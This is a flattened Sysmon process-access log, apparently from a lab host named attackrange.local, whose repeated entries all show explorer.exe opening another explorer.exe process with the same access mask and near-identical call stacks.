16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 